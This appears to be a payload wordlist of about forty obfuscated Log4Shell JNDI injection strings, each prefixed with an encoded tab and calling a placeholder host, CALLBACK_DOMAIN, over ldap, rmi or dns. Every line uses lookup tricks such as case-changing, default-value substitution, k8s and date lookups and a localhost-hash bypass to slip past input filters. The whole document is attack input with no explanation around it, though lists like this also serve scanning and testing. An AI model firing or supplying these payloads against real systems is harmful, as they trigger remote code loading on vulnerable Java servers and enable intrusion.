%09${${::-j}${::-n}${::-d}${::-I}:${::-l}${::-d}${::-a}${::-p}://CALLBACK_DOMAIN/poc}
%09${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}://CALLBACK_DOMAIN/poc}
%09${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://CALLBACK_DOMAIN/poc}
%09${${::-j}ndi:rmi://CALLBACK_DOMAIN/poc}
%09${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://CALLBACK_DOMAIN/poc}
%09${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//CALLBACK_DOMAIN/poc}
%09${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//CALLBACK_DOMAIN/poc}
%09${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://CALLBACK_DOMAIN/poc}
%09${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//CALLBACK_DOMAIN/poc}
%09${${lower:${lower:jndi}}:${lower:rmi}://CALLBACK_DOMAIN/poc}
%09${${lower:jndi}:${lower:rmi}://CALLBACK_DOMAIN/poc}
%09${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://CALLBACK_DOMAIN/poc}
%09${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://CALLBACK_DOMAIN/poc}
%09${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://CALLBACK_DOMAIN/poc}
%09${${lower:n}${lower:d}i:${lower:rmi}://CALLBACK_DOMAIN/poc}
%09${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://CALLBACK_DOMAIN/poc}
%09${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://CALLBACK_DOMAIN/poc}
%09${j${123123123:-n}di${123123123:-:}ldap:${123123123:-//}CALLBACK_DOMAIN/poc}
%09${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://CALLBACK_DOMAIN/poc}
%09${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//CALLBACK_DOMAIN/poc
%09${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//CALLBACK_DOMAIN/poc}
%09${j${k8s:k5:-ND}i${sd:k5:-:}ldap://CALLBACK_DOMAIN/poc}
%09${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//CALLBACK_DOMAIN/poc}
%09${j${k8s:k5:-ND}i:ldap://CALLBACK_DOMAIN/poc}
%09${jnd${123%25ff:-${123%25ff:-i:}}ldap://CALLBACK_DOMAIN/poc}
%09${jnd${sys:UNIX:-i}:ldap:/CALLBACK_DOMAIN/poc}
%09${jnd${upper:i}:ldap://CALLBACK_DOMAIN/poc}                       
%09${jnd${upper:ı}:ldap://CALLBACK_DOMAIN/poc}
%09${jndi${123%25ff:-}:ldap://CALLBACK_DOMAIN/poc}
%09${jndi:${lower:l}${lower:d}a${lower:p}://CALLBACK_DOMAIN}
%09${jndi:dns://CALLBACK_DOMAIN/poc}
%09${jndi:dns://CALLBACK_DOMAIN}
%09${jndi:ldap://127.0.0.1#CALLBACK_DOMAIN/poc}
%09${jndi:ldap://127.0.0.1#CALLBACK_DOMAIN:1389/poc}
%09${jndi:ldap://127.0.0.1#{\{CALLBACK_DOMAIN}}/{poc}}
%09${jndi:ldap://127.1.1.1#CALLBACK_DOMAIN/poc}
%09${jndi:ldap://CALLBACK_DOMAIN/poc}
%09${jndi:rmi://CALLBACK_DOMAIN/poc}
%09${jndi:rmi://CALLBACK_DOMAIN}
%09${jndi:rmi://CALLBACK_DOMAIN}/
